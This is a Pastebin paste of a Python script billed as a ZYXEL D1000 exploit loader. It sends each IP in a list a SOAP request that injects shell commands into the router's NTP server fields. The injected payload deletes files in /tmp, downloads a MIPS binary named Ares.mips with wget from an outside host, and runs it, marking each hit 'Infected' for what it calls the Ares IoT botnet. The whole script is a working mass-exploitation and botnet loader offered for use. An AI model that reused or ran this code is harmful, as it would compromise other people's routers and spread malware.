Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # ZYXEL D1000 Exploit Loader base by DevilsExp & B4ckdoor #
- # B4CKDOORARCHIVE.CLUB [NEWDOMAIN] | JOIN DISCORD BY WEBSITE INVITE LINK #
- import requests
- import threading
- import time
- import sys
- payload = "cd /tmp && rm -rf * && /bin/busybox wget http://1.1.1.1/Ares.mips && chmod 777 /tmp/tr064 && /tmp/tr064 tr064"
- #payload = "cd /tmp;wget http://1.1.1.1/Ares.mips;chmod 777 Ares.mips;./Ares.mips d1064" # Ports 5555 80 8080
- post_data = "<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\"><NewNTPServer1>PAYLOAD HERE</NewNTPServer1><NewNTPServer2>`"+payload+"`</NewNTPServer2><NewNTPServer3>`echo AresIotBotnet`</NewNTPServer3><NewNTPServer4>`echo AresIotBotnet`</NewNTPServer4><NewNTPServer5>`echo AresIotBotnet`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
- def exploit(target, port):
- try:
- r = requests.post(
- "http://"+target+":"+str(port)+"/UD/act?1",
- headers={
- "SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys",
- "content-type": "text/xml"
- },
- data = post_data
- )
- if "D1000" in r.text:
- print "Infected " + target
- except Exception as e:
- pass
- if len(sys.argv) < 2:
- exit(sys.argv[0]+" [LIST] [PORT]")
- else:
- ips = open(sys.argv[1], "r").readlines()
- port = int(sys.argv[2])
- for ip in ips:
- #print ip.strip()
- threading.Thread(target=exploit, args=(ip.strip(), port)).start()
- time.sleep(0.02)
Add Comment
Please, Sign In to add comment